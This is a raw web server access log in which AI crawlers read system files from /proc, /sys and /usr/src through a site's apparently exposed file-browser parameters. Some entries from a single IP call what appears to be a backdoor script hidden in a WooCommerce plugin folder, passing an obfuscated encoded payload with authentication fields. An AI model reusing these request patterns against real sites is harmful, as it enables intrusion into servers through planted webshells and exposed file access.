216.73.216.122 - - [02/Aug/2026:02:00:39 +0200] "GET /?fileloc=%2F%2Fproc%2F3%2Fstack&path=%2F%2Fproc%2F3 HTTP/1.1" 200 2704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/power HTTP/1.1" 200 3470 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:00:42 +0200] "GET /?path=%2F%2Fproc%2F3086921%2Fnet%2Fdev_snmp6 HTTP/1.1" 200 3087 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:43 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:00:45 +0200] "GET /?fileloc=%2F%2Fproc%2Fkmsg&path=%2F%2Fproc HTTP/1.1" 200 2696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2 HTTP/1.1" 200 3504 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:00:48 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fmnt_cache%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Fmnt_cache HTTP/1.1" 200 2728 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:00:51 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Ffat_cache%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Ffat_cache HTTP/1.1" 200 2728 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:58:31 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323331312p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383731312q6131636230653439306661653162653439616466323962613930623063306261222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:00:54 +0200] "GET /?path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-rnd-13-512 HTTP/1.1" 200 4089 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:00:57 +0200] "GET /?fileloc=%2F%2Fsys%2Fblock%2Floop3%2Fpartscan&path=%2F%2Fsys%2Fblock%2Floop3 HTTP/1.1" 200 2719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:00:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:00 +0200] "GET /?fileloc=%2F%2Fproc%2F3290586%2Fsessionid&path=%2F%2Fproc%2F3290586 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2 HTTP/1.1" 200 3504 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:03 +0200] "GET /?fileloc=%2F%2Flib%2Fgit-core%2Fgit-cherry&path=%2F%2Flib%2Fgit-core HTTP/1.1" 200 1731427 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:07 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fmin_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2 HTTP/1.1" 200 3505 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:09 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fmin_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0 HTTP/1.1" 200 3505 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:12 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fremote_node_defrag_ratio&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2747 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:14 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/power/autosuspend_delay_ms&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/power HTTP/1.1" 200 2827 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory7/power" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:15 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:01:58:54 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323333342p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383733342q3535646266393263303466326430666266666430393538653933623236653566222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:01:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:18 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fremote_node_defrag_ratio&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:21 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Ftrace&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:24 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/removable&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3 HTTP/1.1" 200 2810 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:24 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fcache_dma&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:27 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:27 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fcache_dma&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:30 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:30 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fobject_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:02:01:33 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fobject_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:36 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:39 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fslabs_cpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:01:59:17 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323335372p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383735372q6634313363303139313637366365363533326365373833343063313764393035222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:01:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:42 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:42 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/online&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2 HTTP/1.1" 200 2804 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:45 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fslabs_cpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:48 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fhwcache_align&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:51 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fhwcache_align&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/subsystem/devices HTTP/1.1" 200 4924 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:54 +0200] "GET /?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fvirt%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fvirt HTTP/1.1" 200 2777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:01:57 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fvalidate&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:01:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/subsystem/devices HTTP/1.1" 200 4922 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:00 +0200] "GET /?fileloc=%2F%2Fsys%2Fclass%2Ftty%2FttyS21%2Fdev&path=%2F%2Fsys%2Fclass%2Ftty%2FttyS21 HTTP/1.1" 200 2726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:59:40 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323338302p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383738302q6136303763326637636662363766656364326238323334323335303363316362222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:02:03 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fvalidate&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:06 +0200] "GET /?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fbpf%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fbpf HTTP/1.1" 200 4069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:09 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fpartial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/subsystem/devices HTTP/1.1" 200 4922 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
